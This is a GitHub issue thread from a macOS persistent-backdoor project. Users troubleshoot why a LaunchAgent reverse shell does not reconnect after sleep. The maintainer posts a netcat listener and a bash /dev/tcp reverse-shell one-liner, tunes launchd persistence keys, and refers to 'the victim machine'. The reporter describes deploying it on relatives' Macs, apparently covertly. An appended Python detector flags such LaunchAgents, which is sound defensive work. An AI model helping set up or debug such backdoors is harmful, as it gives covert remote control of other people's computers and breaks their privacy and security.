OSX-Peristant-BackDoor

StartInterval not working on Yosemite

Open theinvinciblesun opened this issue 10 years ago • 7 comments

The backdoor connects when the Mac is rebooted as per RunOnLoad for the first time but fails to connect on subsequent intervals if one exits the first session.

theinvinciblesun, Jan 12 '15 05:01

I was not able to reproduce this on

ProductName: Mac OS X
ProductVersion: 10.10.3
BuildVersion: 14D54

I had the launch agent connect to myself locally. I killed the captured shell with Ctrl-C.

nc -l 1337
bash -i >& /dev/tcp/localhost/1337 0>&1

Can you tell me more about this issue? Thanks

mosca1337, Jan 12 '15 06:01

Well, the backdoor connects to me when the computer is restarted. If the Mac is put to sleep while the connection is alive and reawoken a while later, the connection does not connect back to me. While the Mac was asleep I had also killed the connection from my side using the kill command, as the shell was non-responsive. It's my cousin's Mac that I am experimenting on, and so it is only available when I visit him. I'll try to get more details ASAP.

theinvinciblesun, Jan 12 '15 08:01

Hmm, you could try playing around with the keys in the launch agent plist. I believe that there may be some settings to "execute and forget", which may help with disconnects and sleeping computers.

Documentation and keys here: https://developer.apple.com/library/mac/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

Let me know what you find.

mosca1337, Jan 13 '15 05:01

Hmm, I tried using the KeepAlive and ThrottleInterval keys but the issue persists. Again, the Mac was put to sleep and the connection terminated by me whilst it was sleeping. I'll try other things over this week and report back.

theinvinciblesun, Jan 13 '15 18:01

OK, I have a clear picture of this. Once the Mac is put to sleep while the connection is alive, the process never restarts again, using both StartInterval and the KeepAlive with ThrottleInterval keys. The only way it restarts is if one exits the shell whilst the Mac is still awake.

theinvinciblesun, Jan 19 '15 18:01

Interesting. It sounds as though the TCP connection "breaks" when the host falls asleep; however, the process remains "alive". The LaunchAgent plist is set to keep the process alive, but it is probably not re-executed since the process hangs or simply stays alive.

Can you run launchctl list and find the process status on the victim machine? It would be interesting to know if the process simply remains alive after the machine goes to sleep or if the process exits with some failed return status.

mosca1337, Jan 28 '15 00:01

Will. Just moved to a new city. My aunt has a MacBook Pro so I can experiment full time. Will do this and more tests tonight and revert back to you. It might be possible that the wait command causes problems. Not using the wait command and using the KeepAlive key instead in your original code might solve the problem. Will tell you tonight.

theinvinciblesun, Jan 30 '15 11:01
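
A defender-side check for the persistence mechanism discussed in this thread, as an added example that is not part of the original thread or the project's code: it parses a LaunchAgent plist and reports a job whose command matches the /dev/tcp shell pattern quoted above, together with the launchd keys that start or restart it. The sample plists, labels and the function name are constructed for illustration; RunAtLoad is launchd's actual key name.

```python
import plistlib
import re

# Keys that make launchd start or restart a job without user action.
PERSISTENCE_KEYS = ("RunAtLoad", "StartInterval", "KeepAlive")
# Command patterns typical of an interactive shell redirected to a socket.
SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    re.compile(r"\b(?:ba|z|k)?sh\s+-i\b"),
]

def audit_launch_agent(plist_bytes):
    """Return a list of findings for one LaunchAgent plist (empty if none)."""
    job = plistlib.loads(plist_bytes)
    # launchd runs ProgramArguments, or Program when no arguments are given.
    argv = job.get("ProgramArguments") or [job.get("Program", "")]
    command = " ".join(str(a) for a in argv)
    findings = []
    for pattern in SHELL_PATTERNS:
        if pattern.search(command):
            findings.append("command matches " + pattern.pattern)
    if findings:
        # Persistence keys are normal on their own; report them only
        # when the command itself already looks like a socket shell.
        for key in PERSISTENCE_KEYS:
            if job.get(key):
                findings.append("%s=%r" % (key, job[key]))
    return findings

# Constructed sample: the command quoted in the thread, wrapped in a job.
SUSPICIOUS = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/bin/bash", "-c",
                         "bash -i >& /dev/tcp/localhost/1337 0>&1"],
    "RunAtLoad": True,
    "StartInterval": 60,
})
# Constructed sample: an ordinary daemon that also uses KeepAlive.
BENIGN = plistlib.dumps({
    "Label": "com.example.sync",
    "ProgramArguments": ["/usr/local/bin/syncd", "--foreground"],
    "KeepAlive": True,
})

if __name__ == "__main__":
    for name, data in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, audit_launch_agent(data))
```

On a real host the same function can be fed the bytes of each file under ~/Library/LaunchAgents and /Library/LaunchAgents.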